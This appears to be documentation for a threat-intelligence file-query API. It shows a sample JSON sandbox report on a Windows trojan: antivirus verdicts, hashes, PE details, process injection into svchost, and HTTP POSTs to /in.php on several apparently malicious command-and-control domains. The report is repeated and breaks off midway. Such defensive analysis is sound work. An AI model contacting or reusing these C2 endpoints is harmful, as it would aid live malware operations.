curl --request POST \
--url https://api.threatbook.io/v2/file/query
{
"response_code": 200,
"msg": "Success",
"multiengines": {
"result": {
"IKARUS": "safe",
"vbwebshell": "safe",
"Avast": "Win32:Fareit-CW",
"Avira": "Worm/Gamarue.ioemn",
"Sophos": "safe",
"K7": "EmailWorm ( 0040f1211 )",
"Rising": "safe",
"Kaspersky": "Trojan-Ransom.Win32.PornoAsset.cpbb",
"Panda": "Trj/Genetic.gen",
"Baidu-China": "Win32.Trojan.WisdomEyes.151026.9950.9999",
"NANO": "safe",
"Antiy": "Trojan[Downloader]/Win32.Wauchos",
"AVG": "Win32:Fareit-CW",
"Baidu": "safe",
"DrWeb": "safe",
"GDATA": "Gen:Variant.Sirefef.2107",
"Microsoft": "TrojanDropper:Win32/Gamarue.C",
"Qihu360": "Win32/Botnet.Andromeda.HxQBeV0A",
"ESET": "safe",
"ClamAV": "safe",
"JiangMin": "Trojan/PornoAsset.plh",
"Trustlook": "safe",
"MicroAPT": "safe",
"OneAV": "safe",
"OneStatic": "safe",
"MicroNonPE": "safe",
"OneAV-PWSH": "safe",
"ShellPub": "safe"
},
"scan_time": "2025-10-15 07:37:59",
"detect_rate": "12/28"
},
"summary": {
"sha1": "9156eaa5ed26bc220aaac3baf56241c48e7e03c1",
"md5": "b102cd8c3a882636a4ec337a9344a3a6",
"scenes": [],
"tag": {
"s": [
"exe",
"lang_english"
],
"x": [
"Trojan",
"PornoAsset"
]
},
"file_size": 64000,
"is_whitelist": false,
"malware_type": "Trojan",
"malware_family": "PornoAsset",
"sandbox_type_list": [
"win10_1903_enx64_office2016"
],
"threat_level": "malicious",
"submit_time": "2025-08-24 15:00:58",
"last_detection_time": "2025-10-15 15:37:59",
"file_name": "9145f476a9f1f3b793709276de9631dd406e4f240863bbf3d6c66bc3456feb4d",
"file_type": "EXEx86",
"sample_sha256": "9145f476a9f1f3b793709276de9631dd406e4f240863bbf3d6c66bc3456feb4d",
"threat_score": 90,
"sandbox_type": "win10_1903_enx64_office2016",
"multi_engines": "12/28"
},
"signature": [
{
"severity": 1,
"gray": false,
"references": [],
"sig_class": "Network Related",
"name": "network_http",
"description": "{\"en\": \"Performs some HTTP requests\", \"cn\": \"样本发起了HTTP请求\"}",
"markcount": 5,
"marks": [
{
"type": "generic",
"generic": {
"host": "anam0rph.su",
"request": "POST /in.php HTTP/1.1\r\nHost: anam0rph.su\r\nUser-Agent: Mozilla/4.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 84\r\nConnection: close",
"uri": "/in.php"
}
},
{
"type": "generic",
"generic": {
"host": "bdcrqgonzmwuehky.nl",
"request": "POST /in.php HTTP/1.1\r\nHost: bdcrqgonzmwuehky.nl\r\nUser-Agent: Mozilla/4.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 84\r\nConnection: close",
"uri": "/in.php"
}
},
{
"type": "generic",
"generic": {
"host": "somicrososoft.ru",
"request": "POST /in.php HTTP/1.1\r\nHost: somicrososoft.ru\r\nUser-Agent: Mozilla/4.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 84\r\nConnection: close",
"uri": "/in.php"
}
}
],
"families": [],
"attck_id": "",
"attck_info": {}
},
{
"severity": 1,
"gray": false,
"references": [],
"sig_class": "Environment Awareness",
"name": "read_active_computer_name",
"description": "{\"en\": \"Reads the active computer name\", \"cn\": \"读取计算机名称\"}",
"markcount": 1,
"marks": [
{
"type": "ioc",
"ioc": {
"pid": [
6968
],
"category": "registry",
"ioc": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\ComputerName\\ActiveComputerName\\ComputerName"
}
}
],
"families": [],
"attck_id": "T1087",
"attck_info": {
"Contributors": "Travis Smith, Tripwire",
"title": "Account Discovery",
"Permissions Required": "User",
"Platform": "Linux, macOS, Windows",
"Data Sources": "API monitoring, Process command-line parameters, Process monitoring",
"Tactic": "Discovery",
"CAPEC ID": "CAPEC-575",
"ID": "T1087"
}
},
{
"severity": 3,
"gray": false,
"references": [],
"sig_class": "Malware behavior",
"name": "suspicious_pe_in_memory",
"description": "{\"en\": \"Detected PE file in memory\", \"cn\": \"在内存中检测到PE文件\"}",
"markcount": 3,
"marks": [
{
"type": "generic",
"generic": {
"virtual_address": "0x3970000",
"size": 64512,
"memory_type": "PE",
"pid": 5612,
"process_path": "C:\\Users\\Administrator\\Desktop\\6feb4d.exe"
}
},
{
"type": "generic",
"generic": {
"virtual_address": "0x3ae0000",
"size": 1688,
"memory_type": "shellcode",
"pid": 5612,
"process_path": "C:\\Users\\Administrator\\Desktop\\6feb4d.exe"
}
},
{
"type": "generic",
"generic": {
"virtual_address": "0x6c70000",
"size": 14710,
"memory_type": "shellcode",
"pid": 6968,
"process_path": "C:\\Windows\\SysWOW64\\svchost.exe"
}
}
],
"families": [],
"attck_id": "",
"attck_info": {}
}
],
"static": {
"details": {
"pe_version_info": [],
"pe_sections": [
{
"name": ".text",
"virtual_address": "0x00001000",
"virtual_size": "0x0000518e",
"size_of_data": "0x00005200",
"pointer_to_rawdata": "0x00000400",
"hash": "e6f69cb384e70bf825dcbeb133e0dbbc",
"SectionPermission": "R-E",
"entropy": 6.892130502363175
},
{
"name": ".reloc",
"virtual_address": "0x00014000",
"virtual_size": "0x00001da5",
"size_of_data": "0x00001e00",
"pointer_to_rawdata": "0x0000dc00",
"hash": "3c89baa0cc859837bb9ac8917b6058d7",
"SectionPermission": "RW-",
"entropy": 6.966489345591115
}
],
"pe_signatures": {
"product": "n/a",
"verified": "Unsigned",
"description": "n/a"
},
"pe_imports": [
{
"dll": "SHLWAPI.dll",
"imports": [
{
"address": "0x40e000",
"name": "PathIsURLW"
},
{
"address": "0x40e004",
"name": "PathGetDriveNumberA"
},
{
"address": "0x40e008",
"name": "PathIsRelativeA"
}
]
},
{
"dll": "KERNEL32.dll",
"imports": [
{
"address": "0x40e020",
"name": "lstrcpyW"
}
]
}
],
"pe_resources": [
{
"name": "RT_ICON",
"offset": "0x00013160",
"size": "0x00000128",
"filetype": "GLS_BINARY_LSB_FIRST",
"language": "LANG_ENGLISH",
"sublanguage": "SUBLANG_ENGLISH_US"
},
{
"name": "RT_GROUP_ICON",
"offset": "0x00013728",
"size": "0x00000092",
"filetype": "data",
"language": "LANG_ENGLISH",
"sublanguage": "SUBLANG_ENGLISH_US"
}
],
"tag": [],
"pe_basic": {
"tls_info": {},
"import_hash": "540cba6657a101cb43bb9f60920f4768",
"peid": [
"filetype: PE32",
"arch: I386",
"mode: 32",
"endianess: LE",
"type: GUI",
"compiler: Microsoft Visual C/C++(2008 SP1)[-]",
"linker: Microsoft Linker(9.0)[GUI32]"
],
"time_stamp": "2012-10-09 09:11:58",
"entry_point_section": ".text",
"image_base": "0x400000",
"entry_point": "0x4505"
},
"pe_detect": {
"find_crypt": {},
"urls": []
},
"pe_exports": [
{
"address": "0x401b28",
"name": "FirstMagnitudE",
"ordinal": 1
},
{
"address": "0x40446f",
"name": "?SecondMagni@@YGEUCOMMANDLINE094@@WE",
"ordinal": 2
}
]
},
"basic": {
"sha1": "9156eaa5ed26bc220aaac3baf56241c48e7e03c1",
"sha256": "9145f476a9f1f3b793709276de9631dd406e4f240863bbf3d6c66bc3456feb4d",
"file_type": "PE32 executable (GUI) Intel 80386, for MS Windows",
"file_name": "9145f476a9f1f3b793709276de9631dd406e4f240863bbf3d6c66bc3456feb4d",
"ssdeep": "768:8ZYOGJ8z39m6odrD2ydQtaCGvRDvqguFjI3LOLisuIPcH9e3FEx8EFK4AVSi0WC4:83t2dGanvsh2ki4PQeVEKE38TCNMBMpw",
"file_size": 64000,
"md5": "b102cd8c3a882636a4ec337a9344a3a6"
}
},
"pstree": {
"children": [
{
"pid": 5612,
"ppid": 3832,
"process_name": "6feb4d.exe",
"command_line": "\"C:\\Users\\Administrator\\Desktop\\6feb4d.exe\" ",
"argument_vector": [
"C:\\Users\\Administrator\\Desktop\\6feb4d.exe"
],
"first_seen": 1756047699918.287,
"children": [
{
"pid": 6968,
"ppid": 5612,
"process_name": "svchost.exe",
"command_line": "C:\\Windows\\syswow64\\svchost.exe",
"argument_vector": [
"C:\\Windows\\syswow64\\svchost.exe"
],
"first_seen": 1756047703968.084,
"children": [],
"track": true
}
],
"track": true
}
],
"process_name": {
"en": "Analysed 2 processes in total",
"cn": "共分析了2个进程"
}
},
"network": {
"mitm": [],
"tcp": [
{
"src": "100.64.8.14",
"sport": 49723,
"dst": "50.16.27.236",
"dport": 80,
"offset": 144133,
"time": 19.677597045898438,
"ppid": 5612,
"pid": 6968,
"process_path": "C:\\Windows\\SysWOW64\\svchost.exe",
"process_name": "svchost.exe"
},
{
"src": "100.64.8.14",
"sport": 49726,
"dst": "176.58.104.168",
"dport": 80,
"offset": 153964,
"time": 21.888036012649536,
"ppid": 5612,
"pid": 6968,
"process_path": "C:\\Windows\\SysWOW64\\svchost.exe",
"process_name": "svchost.exe"
}
],
"udp": [],
"icmp": [],
"http": [
{
"count": 3,
"host": "anam0rph.su",
"port": 80,
"data": "POST /in.php HTTP/1.1\r\nHost: anam0rph.su\r\nUser-Agent: Mozilla/4.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 84\r\nConnection: close\r\n\r\n",
"uri": "/in.php",
"body": "",
"path": "/in.php",
"url": "http://anam0rph.su/in.php",
"user-agent": "Mozilla/4.0",
"version": "1.1",
"method": "POST"
},
{
"count": 3,
"host": "somicrososoft.ru",
"port": 80,
"data": "POST /in.php HTTP/1.1\r\nHost: somicrososoft.ru\r\nUser-Agent: Mozilla/4.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 84\r\nConnection: close\r\n\r\n",
"uri": "/in.php",
"body": "",
"path": "/in.php",
"url": "http://somicrososoft.ru/in.php",
"user-agent": "Mozilla/4.0",
"version": "1.1",
"method": "POST"
}
],
"tls": [],
"dns": [
{
"request": "somicrososoft.ru",
"type": "A",
"answers": [
{
"type": "A",
"data": "3.229.117.57",
"time": 22.89440417289734
},
{
"type": "A",
"data": "3.229.117.57",
"time": 43.141231060028076
},
{
"type": "A",
"data": "3.229.117.57",
"time": 62.58969497680664
}
],
"time": 22.542392015457153
}
],
"smtp": [],
"irc": [],
"irc_ex": [],
"dns_servers": [
"223.5.5.5",
"8.8.4.4"
],
"fingerprint": [],
"tcp_ex": [
{
"src": "100.64.8.14",
"dst": "50.16.27.236",
"sport": 49723,
"dport": 80,
"proto": 6,
"time": 19.677597045898438,
"tcp_detail": [
{
"time": 19.677597045898438,
"type": "request",
"size": 241,
"sha256": "fe7525bf77fe49345f26413e8ba8824834beae6d5984ece4f4c581a3df99bf74"
},
{
"time": 19.677597045898438,
"type": "response",
"size": 149,
"sha256": "ea4600ec90525266d9f4458351d0c971ccda17162400a7765c8293700c829a15"
}
],
"proc_path": "C:\\Windows\\SysWOW64\\svchost.exe",
"proc_name": "svchost.exe",
"pid": 6968
},
{
"src": "100.64.8.14",
"dst": "3.229.117.57",
"sport": 49742,
"dport": 80,
"proto": 6,
"time": 62.59141516685486,
"tcp_detail": [
{
"time": 62.59141516685486,
"type": "request",
"size": 246,
"sha256": "e2bfffd5c77cd0f552d6969942a18676874e55774da0c94f9461c37e921d1826"
},
{
"time": 62.59141516685486,
"type": "response",
"size": 149,
"sha256": "45ca865eba2b31cd28ca8bfe44fa6c4a16f25bd92e520a1761701a75270c34ac"
}
],
"proc_path": "C:\\Windows\\SysWOW64\\svchost.exe",
"proc_name": "svchost.exe",
"pid": 6968
}
],
"smtp_ex": [],
"http_ex": [
{
"time": 23.122490167617798,
"src": "100.64.8.14",
"sport": 49727,
"dst": "3.229.117.57",
"dport": 80,
"protocol": "http",
"method": "POST",
"host": "somicrososoft.ru",
"uri": "/in.php",
"url": "http://somicrososoft.ru/in.php",
"status": 200,
"request": "POST /in.php HTTP/1.1\r\nHost: somicrososoft.ru\r\nUser-Agent: Mozilla/4.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 84\r\nConnection: close",
"response": "HTTP/1.1 200 OK\r\nServer: nginx\r\nDate: Sun, 24 Aug 2025 15:01:49 GMT\r\nContent-Type: application/octet-stream\r\nContent-Length: 0\r\nConnection: close",
"req": {
"file_info": {
"name": "33f91bbc0b502f8daab951737c8088a190422a211fe1ae4c0481c96618e5b862",
"size": 84,
"crc32": "84E1BCE3",
"md5": "2fad74b4750ec31092830231e76a6c3f",
"sha1": "d4a2a32ed81842f4a392cb3c5b430e4ce2c4820f",
"sha256": "33f91bbc0b502f8daab951737c8088a190422a211fe1ae4c0481c96618e5b862",
"sha512": "c797da42edae157cc27c6d274023a17cd23ffc139705e97f06a3cae6cd74f9b61aa23de2bbc5c985dfea610c787f3e70d4f594f3f8b19a3b3a9dd8b60df50ffd",
"ssdeep": "3:AfNmSUjGVLUooLWvU7jURTK9k8OQoC50rY:AfNmSUjAwxKvu8M1OQogZ",
"type": "ASCII text, with no line terminators",
"yara": [],
"domains": [],
"ips": [],
"urls": [],
"mails": []
},
"trid_info": [],
"md5": "2fad74b4750ec31092830231e76a6c3f",
"sha1": "d4a2a32ed81842f4a392cb3c5b430e4ce2c4820f",
"sha256": "33f91bbc0b502f8daab951737c8088a190422a211fe1ae4c0481c96618e5b862"
},
"resp": {
"file_info": {
"name": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"size": 0,
"crc32": "00000000",
"md5": "d41d8cd98f00b204e9800998ecf8427e",
"sha1": "da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"sha512": "cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e",
"ssdeep": "3::",
"type": "empty",
"yara": [],
"domains": [],
"ips": [],
"urls": [],
"mails": []
},
"trid_info": [],
"md5": "d41d8cd98f00b204e9800998ecf8427e",
"sha1": "da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
},
"md5": "d41d8cd98f00b204e9800998ecf8427e",
"sha1": "da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"pid": 6968,
"process_name": "svchost.exe"
}
],
"https_ex": [],
"dead_hosts": [],
"domains": [
{
"domain": "bdcrqgonzmwuehky.nl",
"ip": "176.58.104.168"
},
{
"domain": "somicrososoft.ru",
"ip": "3.229.117.57"
}
],
"hosts": [
"3.229.117.57",
"176.58.104.168"
]
},
"dropped": [
{
"sha1": "9156eaa5ed26bc220aaac3baf56241c48e7e03c1",
"threat_level": "malicious",
"urls": [],
"sha256": "9145f476a9f1f3b793709276de9631dd406e4f240863bbf3d6c66bc3456feb4d",
"size": 64000,
"filepath": "C:\\ProgramData\\Local Settings\\Temp\\msajyt.cmd",
"name": "msajyt.cmd",
"crc32": "49F50535",
"ssdeep": "768:8ZYOGJ8z39m6odrD2ydQtaCGvRDvqguFjI3LOLisuIPcH9e3FEx8EFK4AVSi0WC4:83t2dGanvsh2ki4PQeVEKE38TCNMBMpw",
"type": "PE32 executable (GUI) Intel 80386, for MS Windows",
"yara": [],
"md5": "b102cd8c3a882636a4ec337a9344a3a6"
}
],
"strings": {
"5612_88165644311524082025": [
";x\\&:}V*",
"hdll.hsbie",
"kernel32.dll",
".]a[<HI",
"hsk\\ehs\\dihviceh\\serhlsethntrohntcohurrehem\\chsyst",
"h.dllhpi32hadva",
"!This program cannot be run in DOS mode."
],
"5612_51029104311524082025": [
"ntdll.dll",
"lstrcatW",
"CloseHandle",
"\\syswow64\\svchost.exe",
"\\system32\\wuauclt.exe",
"VirtualFree",
"NtDelayExecution",
"ZwUnmapViewOfSection",
"ZwQueryInformationProcess"
],
"pcap": [
"DESKTOP-H9URB7T ",
"bigcatalog",
"MSFT 5.0",
"Date: Sun, 24 Aug 2025 15:02:07 GMT",
"edgekey",
" EEEFFDELFEEPFACNEIDJFFFCECDHFECA",
"!http://oneocsp.microsoft.com/ocsp0",
"sidnlabs"
]
}
}
File Intelligence
Retrieve detailed static and dynamic analysis reports of a file, including file summary information, network behavior, behavioral signatures, static information, dropped behavior, process behavior, and multi-engines detection results.
curl --request POST \
--url https://api.threatbook.io/v2/file/query
{
"response_code": 200,
"msg": "Success",
"multiengines": {
"result": {
"IKARUS": "safe",
"vbwebshell": "safe",
"Avast": "Win32:Fareit-CW",
"Avira": "Worm/Gamarue.ioemn",
"Sophos": "safe",
"K7": "EmailWorm ( 0040f1211 )",
"Rising": "safe",
"Kaspersky": "Trojan-Ransom.Win32.PornoAsset.cpbb",
"Panda": "Trj/Genetic.gen",
"Baidu-China": "Win32.Trojan.WisdomEyes.151026.9950.9999",
"NANO": "safe",
"Antiy": "Trojan[Downloader]/Win32.Wauchos",
"AVG": "Win32:Fareit-CW",
"Baidu": "safe",
"DrWeb": "safe",
"GDATA": "Gen:Variant.Sirefef.2107",
"Microsoft": "TrojanDropper:Win32/Gamarue.C",
"Qihu360": "Win32/Botnet.Andromeda.HxQBeV0A",
"ESET": "safe",
"ClamAV": "safe",
"JiangMin": "Trojan/PornoAsset.plh",
"Trustlook": "safe",
"MicroAPT": "safe",
"OneAV": "safe",
"OneStatic": "safe",
"MicroNonPE": "safe",
"OneAV-PWSH": "safe",
"ShellPub": "safe"
},
"scan_time": "2025-10-15 07:37:59",
"detect_rate": "12/28"
},
"summary": {
"sha1": "9156eaa5ed26bc220aaac3baf56241c48e7e03c1",
"md5": "b102cd8c3a882636a4ec337a9344a3a6",
"scenes": [],
"tag": {
"s": [
"exe",
"lang_english"
],
"x": [
"Trojan",
"PornoAsset"
]
},
"file_size": 64000,
"is_whitelist": false,
"malware_type": "Trojan",
"malware_family": "PornoAsset",
"sandbox_type_list": [
"win10_1903_enx64_office2016"
],
"threat_level": "malicious",
"submit_time": "2025-08-24 15:00:58",
"last_detection_time": "2025-10-15 15:37:59",
"file_name": "9145f476a9f1f3b793709276de9631dd406e4f240863bbf3d6c66bc3456feb4d",
"file_type": "EXEx86",
"sample_sha256": "9145f476a9f1f3b793709276de9631dd406e4f240863bbf3d6c66bc3456feb4d",
"threat_score": 90,
"sandbox_type": "win10_1903_enx64_office2016",
"multi_engines": "12/28"
},
"signature": [
{
"severity": 1,
"gray": false,
"references": [],
"sig_class": "Network Related",
"name": "network_http",
"description": "{\"en\": \"Performs some HTTP requests\", \"cn\": \"样本发起了HTTP请求\"}",
"markcount": 5,
"marks": [
{
"type": "generic",
"generic": {
"host": "anam0rph.su",
"request": "POST /in.php HTTP/1.1\r\nHost: anam0rph.su\r\nUser-Agent: Mozilla/4.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 84\r\nConnection: close",
"uri": "/in.php"
}
},
{
"type": "generic",
"generic": {
"host": "bdcrqgonzmwuehky.nl",
"request": "POST /in.php HTTP/1.1\r\nHost: bdcrqgonzmwuehky.nl\r\nUser-Agent: Mozilla/4.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 84\r\nConnection: close",
"uri": "/in.php"
}
},
{
"type": "generic",
"generic": {
"host": "somicrososoft.ru",
"request": "POST /in.php HTTP/1.1\r\nHost: somicrososoft.ru\r\nUser-Agent: Mozilla/4.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 84\r\nConnection: close",
"uri": "/in.php"
}
}
],
"families": [],
"attck_id": "",
"attck_info": {}
},
{
"severity": 1,
"gray": false,
"references": [],
"sig_class": "Environment Awareness",
"name": "read_active_computer_name",
"description": "{\"en\": \"Reads the active computer name\", \"cn\": \"读取计算机名称\"}",
"markcount": 1,
"marks": [
{
"type": "ioc",
"ioc": {
"pid": [
6968
],
"category": "registry",
"ioc": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\ComputerName\\ActiveComputerName\\ComputerName"
}
}
],
"families": [],
"attck_id": "T1087",
"attck_info": {
"Contributors": "Travis Smith, Tripwire",
"title": "Account Discovery",
"Permissions Required": "User",
"Platform": "Linux, macOS, Windows",
"Data Sources": "API monitoring, Process command-line parameters, Process monitoring",
"Tactic": "Discovery",
"CAPEC ID": "CAPEC-575",
"ID": "T1087"
}
},
{
"severity": 3,
"gray": false,
"references": [],
"sig_class": "Malware behavior",
"name": "suspicious_pe_in_memory",
"description": "{\"en\": \"Detected PE file in memory\", \"cn\": \"在内存中检测到PE文件\"}",
"markcount": 3,
"marks": [
{
"type": "generic",
"generic": {
"virtual_address": "0x3970000",
"size": 64512,
"memory_type": "PE",
"pid": 5612,
"process_path": "C:\\Users\\Administrator\\Desktop\\6feb4d.exe"
}
},
{
"type": "generic",
"generic": {
"virtual_address": "0x3ae0000",
"size": 1688,
"memory_type": "shellcode",
"pid": 5612,
"process_path": "C:\\Users\\Administrator\\Desktop\\6feb4d.exe"
}
},
{
"type": "generic",
"generic": {
"virtual_address": "0x6c70000",
"size": 14710,
"memory_type": "shellcode",
"pid": 6968,
"process_path": "C:\\Windows\\SysWOW64\\svchost.exe"
}
}
],
"families": [],
"attck_id": "",
"attck_info": {}
}
],
"static": {
"details": {
"pe_version_info": [],
"pe_sections": [
{
"name": ".text",
"virtual_address": "0x00001000",
"virtual_size": "0x0000518e",
"size_of_data": "0x00005200",
"pointer_to_rawdata": "0x00000400",
"hash": "e6f69cb384e70bf825dcbeb133e0dbbc",
"SectionPermission": "R-E",
"entropy": 6.892130502363175
},
{
"name": ".reloc",
"virtual_address": "0x00014000",
"virtual_size": "0x00001da5",
"size_of_data": "0x00001e00",
"pointer_to_rawdata": "0x0000dc00",
"hash": "3c89baa0cc859837bb9ac8917b6058d7",
"SectionPermission": "RW-",
"entropy": 6.966489345591115
}
],
"pe_signatures": {
"product": "n/a",
"verified": "Unsigned",
"description": "n/a"
},
"pe_imports": [
{
"dll": "SHLWAPI.dll",
"imports": [
{
"address": "0x40e000",
"name": "PathIsURLW"
},
{
"address": "0x40e004",
"name": "PathGetDriveNumberA"
},
{
"address": "0x40e008",
"name": "PathIsRelativeA"
}
]
},
{
"dll": "KERNEL32.dll",
"imports": [
{
"address": "0x40e020",
"name": "lstrcpyW"
}
]
}
],
"pe_resources": [
{
"name": "RT_ICON",
"offset": "0x00013160",
"size": "0x00000128",
"filetype": "GLS_BINARY_LSB_FIRST",
"language": "LANG_ENGLISH",
"sublanguage": "SUBLANG_ENGLISH_US"
},
{
"name": "RT_GROUP_ICON",
"offset": "0x00013728",
"size": "0x00000092",
"filetype": "data",
"language": "LANG_ENGLISH",
"sublanguage": "SUBLANG_ENGLISH_US"
}
],
"tag": [],
"pe_basic": {
"tls_info": {},
"import_hash": "540cba6657a101cb43bb9f60920f4768",
"peid": [
"filetype: PE32",
"arch: I386",
"mode: 32",
"endianess: LE",
"type: GUI",
"compiler: Microsoft Visual C/C++(2008 SP1)[-]",
"linker: Microsoft Linker(9.0)[GUI32]"
],
"time_stamp": "2012-10-09 09:11:58",
"entry_point_section": ".text",
"image_base": "0x400000",
"entry_point": "0x4505"
},
"pe_detect": {
"find_crypt": {},
"urls": []
},
"pe_exports": [
{
"address": "0x401b28",
"name": "FirstMagnitudE",
"ordinal": 1
},
{
"address": "0x40446f",
"name": "?SecondMagni@@YGEUCOMMANDLINE094@@WE",
"ordinal": 2
}
]
},
"basic": {
"sha1": "9156eaa5ed26bc220aaac3baf56241c48e7e03c1",
"sha256": "9145f476a9f1f3b793709276de9631dd406e4f240863bbf3d6c66bc3456feb4d",
"file_type": "PE32 executable (GUI) Intel 80386, for MS Windows",
"file_name": "9145f476a9f1f3b793709276de9631dd406e4f240863bbf3d6c66bc3456feb4d",
"ssdeep": "768:8ZYOGJ8z39m6odrD2ydQtaCGvRDvqguFjI3LOLisuIPcH9e3FEx8EFK4AVSi0WC4:83t2dGanvsh2ki4PQeVEKE38TCNMBMpw",
"file_size": 64000,
"md5": "b102cd8c3a882636a4ec337a9344a3a6"
}
},
"pstree": {
"children": [
{
"pid": 5612,
"ppid": 3832,
"process_name": "6feb4d.exe",
"command_line": "\"C:\\Users\\Administrator\\Desktop\\6feb4d.exe\" ",
"argument_vector": [
"C:\\Users\\Administrator\\Desktop\\6feb4d.exe"
],
"first_seen": 1756047699918.287,
"children": [
{
"pid": 6968,
"ppid": 5612,
"process_name": "svchost.exe",
"command_line": "C:\\Windows\\syswow64\\svchost.exe",
"argument_vector": [
"C:\\Windows\\syswow64\\svchost.exe"
],
"first_seen": 1756047703968.084,
"children": [],
"track": true
}
],
"track": true
}
],
"process_name": {
"en": "Analysed 2 processes in total",
"cn": "共分析了2个进程"
}
},
"network": {
"mitm": [],
"tcp": [
{
"src": "100.64.8.14",
"sport": 49723,
"dst": "50.16.27.236",
"dport": 80,
"offset": 144133,
"time": 19.677597045898438,
"ppid": 5612,
"pid": 6968,
"process_path": "C:\\Windows\\SysWOW64\\svchost.exe",
"process_name": "svchost.exe"
},
{
"src": "100.64.8.14",
"sport": 49726,
"dst": "176.58.104.168",
"dport": 80,
"offset": 153964,
"time": 21.888036012649536,
"ppid": 5612,
"pid": 6968,
"process_path": "C:\\Windows\\SysWOW64\\svchost.exe",
"process_name": "svchost.exe"
}
],
"udp": [],
"icmp": [],
"http": [
{
"count": 3,
"host": "anam0rph.su",
"port": 80,
"data": "POST /in.php HTTP/1.1\r\nHost: anam0rph.su\r\nUser-Agent: Mozilla/4.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 84\r\nConnection: close\r\n\r\n",
"uri": "/in.php",
"body": "",
"path": "/in.php",
"url": "http://anam0rph.su/in.php",
"user-agent": "Mozilla/4.0",
"version": "1.1",
"method": "POST"
},
{
"count": 3,
"host": "somicrososoft.ru",
"port": 80,
"data": "POST /in.php HTTP/1.1\r\nHost: somicrososoft.ru\r\nUser-Agent: Mozilla/4.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 84\r\nConnection: close\r\n\r\n",
"uri": "/in.php",
"body": "",
"path": "/in.php",
"url": "http://somicrososoft.ru/in.php",
"user-agent": "Mozilla/4.0",
"version": "1.1",
"method": "POST"
}
],
"tls": [],
"dns": [
{
"request": "somicrososoft.ru",
"type": "A",
"answers": [
{
"type": "A",
"data": "3.229.117.57",
"time": 22.89440417289734
},
{
"type": "A",
"data": "3.229.117.57",
"time": 43.141231060028076
},
{
"type": "A",
"data": "3.229.117.57",
"time": 62.58969497680664
}
],
"time": 22.542392015457153
}
],
"smtp": [],
"irc": [],
"irc_ex": [],
"dns_servers": [
"223.5.5.5",
"8.8.4.4"
],
"fingerprint": [],
"tcp_ex": [
{
"src": "100.64.8.14",
"dst": "50.16.27.236",
"sport": 49723,
"dport": 80,
"proto": 6,
"time": 19.677597045898438,
"tcp_detail": [
{
"time": 19.677597045898438,
"type": "request",
"size": 241,
"sha256": "fe7525bf77fe49345f26413e8ba8824834beae6d5984ece4f4c581a3df99bf74"
},
{
"time": 19.677597045898438,
"type": "response",
"size": 149,
"sha256": "ea4600ec90525266d9f4458351d0c971ccda17162400a7765c8293700c829a15"
}
],
"proc_path": "C:\\Windows\\SysWOW64\\svchost.exe",
"proc_name": "svchost.exe",
"pid": 6968
},
{
"src": "100.64.8.14",
"dst": "3.229.117.57",
"sport": 49742,
"dport": 80,
"proto": 6,
"time": 62.59141516685486,
"tcp_detail": [
{
"time": 62.59141516685486,
"type": "request",
"size": 246,
"sha256": "e2bfffd5c77cd0f552d6969942a18676874e55774da0c94f9461c37e921d1826"
},
{
"time": 62.59141516685486,
"type": "response",
"size": 149,
"sha256": "45ca865eba2b31cd28ca8bfe44fa6c4a16f25bd92e520a1761701a75270c34ac"
}
],
"proc_path": "C:\\Windows\\SysWOW64\\svchost.exe",
"proc_name": "svchost.exe",
"pid": 6968
}
],
"smtp_ex": [],
"http_ex": [
{
"time": 23.122490167617798,
"src": "100.64.8.14",
"sport": 49727,
"dst": "3.229.117.57",
"dport": 80,
"protocol": "http",
"method": "POST",
"host": "somicrososoft.ru",
"uri": "/in.php",
"url": "http://somicrososoft.ru/in.php",
"status": 200,
"request": "POST /in.php HTTP/1.1\r\nHost: somicrososoft.ru\r\nUser-Agent: Mozilla/4.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 84\r\nConnection: close",
"response": "HTTP/1.1 200 OK\r\nServer: nginx\r\nDate: Sun, 24 Aug 2025 15:01:49 GMT\r\nContent-Type: application/octet-stream\r\nContent-Length: 0\r\nConnection: close",
"req": {
"file_info": {
"name": "33f91bbc0b502f8daab951737c8088a190422a211fe1ae4c0481c96618e5b862",
"size": 84,
"crc32": "84E1BCE3",
"md5": "2fad74b4750ec31092830231e76a6c3f",
"sha1": "d4a2a32ed81842f4a392cb3c5b430e4ce2c4820f",
"sha256": "33f91bbc0b502f8daab951737c8088a190422a211fe1ae4c0481c96618e5b862",
"sha512": "c797da42edae157cc27c6d274023a17cd23ffc139705e97f06a3cae6cd74f9b61aa23de2bbc5c985dfea610c787f3e70d4f594f3f8b19a3b3a9dd8b60df50ffd",
"ssdeep": "3:AfNmSUjGVLUooLWvU7jURTK9k8OQoC50rY:AfNmSUjAwxKvu8M1OQogZ",
"type": "ASCII text, with no line terminators",
"yara": [],
"domains": [],
"ips": [],
"urls": [],
"mails": []
},
"trid_info": [],
"md5": "2fad74b4750ec31092830231e76a6c3f",
"sha1": "d4a2a32ed81842f4a392cb3c5b430e4ce2c4820f",
"sha256": "33f91bbc0b502f8daab951737c8088a190422a211fe1ae4c0481c96618e5b862"
},
"resp": {
"file_info": {
"name": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"size": 0,
